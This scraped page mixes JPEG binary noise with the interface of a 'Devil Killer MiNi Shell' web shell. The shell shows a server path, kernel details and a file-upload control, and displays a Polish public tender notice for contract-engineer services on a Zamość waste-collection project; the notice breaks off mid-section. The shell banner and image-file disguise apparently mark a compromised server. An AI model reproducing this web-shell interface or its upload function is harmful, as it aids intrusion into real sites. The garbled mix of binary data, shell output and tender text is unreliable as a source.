JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250327/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250327/0016539501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji Inżyniera Kontraktu przy realizacji zadania <br/>„Zaprojektowanie i budowa Punktu Selektywnego Zbierania Odpadów Komunalnych wraz z zagospodarowaniem terenu i wyposażeniem” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o. w Zamościu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950242408</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krucza 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zamość</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pgk.zamosc.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pgk.zamosc.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji Inżyniera Kontraktu przy realizacji zadania <br/>„Zaprojektowanie i budowa Punktu Selektywnego Zbierania Odpadów Komunalnych wraz z zagospodarowaniem terenu i wyposażeniem” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-03d4548a-4ba9-4617-a34f-9bbadac89e68</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00165395</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn. „Budowa Punktu Selektywnego Zbierania Odpadów Komunalnych na terenie Miasta Zamość” w ramach działania FENX.01.04 Gospodarka odpadami oraz gospodarka o obiegu zamkniętym priorytetu FENX.01 Wsparcie sektorów energetyka i środowisko z Funduszu Spójności programu Fundusze Europejskie na Infrastrukturę, Klimat, Środowisko 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-03d4548a-4ba9-4617-a34f-9bbadac89e68 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">12.2.	Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz poczty elektronicznej w przypadkach, o których mowa w pkt 12.14.10 SWZ, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu Platformy e-Zamówienia.<br/>12.3.	Komunikacja między Zamawiającym a Wykonawcą odbywa się zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452), przy czym Zamawiający zaleca przesyłanie danych w formacie .pdf</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">12.5.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>12.6.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia - link: https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu.<br/>12.7.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>12.8.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>12.10.	Wykaz poszczególnych dokumentów i oświadczeń składanych w postępowaniu oraz ich forma, sposób sporządzania i przekazywania zostały określone przez Zamawiającego odpowiednio niniejszej SWZ.<br/>12.11.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>12.11.1.	w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załączniki) lub<br/>12.11.2.	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”), z zastrzeżeniem postanowień pkt. 12.2.<br/>12.12.	Zamawiający przekazuje link prowadzący bezpośrednio do widoku postępowania na stronie http://www.bip.pgk.zamosc.pl/pl/news/0/3/ w części dotyczącej niniejszego postepowania. Dane postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”).<br/>12.14.1.	Komunikacja w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji na portalu e-Zamówienia dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>12.14.2.	W przypadku załączników przekazywanych za pośrednictwem „Formularza do komunikacji”, które są zgodne z Pzp i rozporządzeniem, o którym mowa w pkt. 12.3 opatrzonych kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym mogą być one opatrzone, zgodnie z wyborem wykonawcy/ wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/ podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). <br/>12.14.3.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się do Platformy e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do składania wniosków o wyjaśnienie treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">35.1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz.U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>35.2.	administratorem Pani/Pana danych osobowych jest Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. w Zamościu, ul. Krucza 10, 22-400 Zamość;<br/>35.3.	administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@pgk.zamosc.pl<br/>35.4.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie niniejszego zamówienia publicznego.<br/>35.5.	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy pzp.<br/>35.6.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>35.7.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>35.8.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>35.9.	posiada Pani/Pan:<br/>35.9.1.	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>35.9.2.	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>35.9.3.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>35.9.4.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">JRP/PSZOK/01/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Pełnienie funkcji Inżyniera Kontraktu przy realizacji Zadania „Zaprojektowanie i budowa Punktu Selektywnego Zbierania Odpadów Komunalnych wraz z zagospodarowaniem terenu i wyposażeniem” w ramach Projektu pn. „Budowa Punktu Selektywnego Zbierania Odpadów Komunalnych na terenie Miasta Zamość”.<br/>Zadanie realizowane będzie na podstawie „Warunków Kontraktu na Urządzenia i Budowę z Projektowaniem&#34; – 2 wydanie polskie 2024 (tł. 2. wyd. 2017 wznowionego w 2022 r. z erratą), dalej zwanymi również „żółty FIDIC&#34; oraz zapisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane w zakresie nadzoru inwestorskiego.<br/>Zakres rzeczowy Zadania obejmuje następujące elementy:<br/>- rampa najazdowa z zadaszeniem wraz z wyposażeniem - obiekt nr 1,<br/>- budynek administracyjno-socjalny wraz z wyposażeniem - obiekt nr 2,<br/>- budynek stróżówki wraz z wyposażeniem - obiekt nr 3,<br/>- waga samochodowa zagłębiona o nośności 50 ton (2 szt.),<br/>- ścieżka edukacyjna (wiata z elementami edukacyjnymi),<br/>- punkt wymiany i napraw rzeczy używanych (1 szt.),<br/>- ściany oporowe,<br/>- place manewrowe i technologiczne wraz z chodnikiem,<br/>- miejsca postojowe i parkingowe - 12 miejsc postojowych dla samochodów osobowych, w tym 1 dostosowane dla osób dla niepełnosprawnych,<br/>- przebudowa i rozbudowa drogi wewnętrznej - wydzielenie strefy oczekiwania na wjazd na PSZOK oraz dostosowanie nawierzchni drogi wewnętrznej do ruchu samochodów ciężarowych,<br/>- instalacje zewnętrzne wodno-kanalizacyjne,<br/>- instalacje zewnętrzne elektryczne wraz z oświetleniem terenu,<br/>- instalacja teletechniczna wraz monitoringiem wizyjnym,<br/>- sieć p.poż.,<br/>- ściany oddzielenia pożarowego,<br/>- ogrodzenie terenu PSZOK wraz z bramą przesuwną i szlabanami,<br/>- tereny zielone (wycinka drzew i krzewów kolidujących z zabudową, nowe nasadzenia roślinności).<br/>- strona internetowa dla PSZOK<br/>Planowana lokalizacja Punktu Selektywnego Zbierania Odpadów Komunalnych obejmuje działkę o numerze ewidencyjnym 228/4 wraz z drogą dojazdową zlokalizowaną na działkach 228/2, 228/3 położone przy Alejach 1 Maja w Zamościu. Inwestycja zlokalizowana jest w sąsiedztwie oczyszczalni ścieków, zabudowy magazynowej oraz pól uprawnych. Teren przeznaczony pod budowę jest niezagospodarowany. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71340000-3 - Zintegrowane usługi inżynieryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71541000-2 - Usługi zarządzania projektem budowlanym</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <p class="mb-0">79110000-8 - Usługi w zakresie doradztwa prawnego i reprezentacji prawnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2029-01-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie personelu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 5.2.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>5.2.1.	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>5.2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie określa szczegółowych warunków w tym zakresie. <br/>5.2.3.	sytuacji ekonomicznej i finansowej:<br/>posiadanie polisy odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę gwarancyjną minimum 500.000 złotych (słownie: pięćset tysięcy złotych 00/100)<br/>5.2.4. zdolności technicznej lub zawodowej:<br/>5.2.4.1.	w zakresie zdolności zawodowej - Wykonawca spełni warunek jeżeli przedstawi wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 6 lat, przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie wykaże się wykonaniem w sposób zgodny z obowiązującymi przepisami oraz zasadami wiedzy technicznej i zakończonych w terminie co najmniej jednej usługi, podobnej do przedmiotu zamówienia, polegającej na pełnieniu funkcji inwestora zastępczego/ inżyniera kontraktu oraz sprawowaniu kompleksowego nadzoru inwestorskiego nad zadaniem o wartości robót co najmniej 5.000.000,00 zł brutto oraz załączy dowody określające, czy usługi te zostały wykonane lub w przypadku świadczeń okresowych lub ciągłych są wykonywane należycie. <br/>Za „usługę podobną” do przedmiotu zamówienia Zamawiający uzna wykonanie (a w przypadku świadczeń okresowych lub ciągłych wykonywanie) usługi polegającej na sprawowaniu kompleksowego nadzoru inwestorskiego przy inwestycji realizowanej w oparciu o Warunki Kontraktowe FIDIC lub równoważne, polegającej na budowie lub modernizacji dowolnego obiektu budowlanego kubaturowego, przy czym w ramach inwestycji powinny być wykonywane roboty w następujących branżach: konstrukcyjno – budowlana, sanitarna, elektryczna, AKPiA i drogowa wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączy dowody określające, czy usługi te zostały wykonane lub w przypadku świadczeń okresowych lub ciągłych są wykonywane należycie. <br/>5.2.4.2.	zakresie zdolności zawodowej osób skierowanych przez Wykonawcę do realizacji zamówienia Wykonawca spełni warunek jeżeli wskaże osoby, które będą uczestniczyć w realizacji zamówienia, legitymujące się kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednim do funkcji jakie zostaną im powierzone: <br/>1)	Inżynier Wiodący (kierownik zespołu) powinien posiadać uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a także udokumentowane doświadczenie zawodowe:<br/>- wykształcenie wyższe lub odpowiednie wykształcenie zdobyte poza granicami Polski,<br/>- co najmniej 5 letnie doświadczenie zawodowe zdobyte przy zarządzaniu podobnymi inwestycjami, w tym świadczenie usługi Inżyniera, Inżyniera Rezydenta lub Przedstawiciela Inżyniera przy co najmniej jednym zakończonym(*) podobnym zadaniu/kontrakcie inwestycyjnym o wartości nie mniejszej niż 5.000.000,00 zł brutto, realizowane w oparciu o Warunki Kontraktowe FIDIC lub równoważne.<br/>- (*) za ukończone zadanie/kontrakt uznaje się te dla którego zostało wydane minimum Świadectwo Przejęcia w rozumieniu warunków kontraktowych FIDIC bądź dokument równoważny (Protokół Odbioru Końcowego). Przez „podobną inwestycję” należy rozumieć inwestycję, polegającą na zaprojektowaniu i budowie lub modernizacji (w rozumieniu ustawy Prawo budowlane) dowolnego obiektu budowlanego kubaturowego, przy czym w ramach robót budowlanych powinny być wykonywane roboty w następujących branżach: konstrukcyjna, sanitarna, elektryczna, AKPiA.<br/>- Zamawiający nie dopuszcza łączenia kilku inwestycji w celu uzyskania sumarycznej kwoty minimum 5.000.000,00 zł brutto.<br/>- Inżynier Wiodący nie może pełnić jednocześnie funkcji inspektora nadzoru <br/>w wielobranżowym zespole nadzoru. Inżynier Wiodący może pełnić jednocześnie funkcję Specjalisty ds. finansów i rozliczeń oraz zarządzania ryzykiem.<br/>2)	Specjalista ds. finansów i rozliczeń 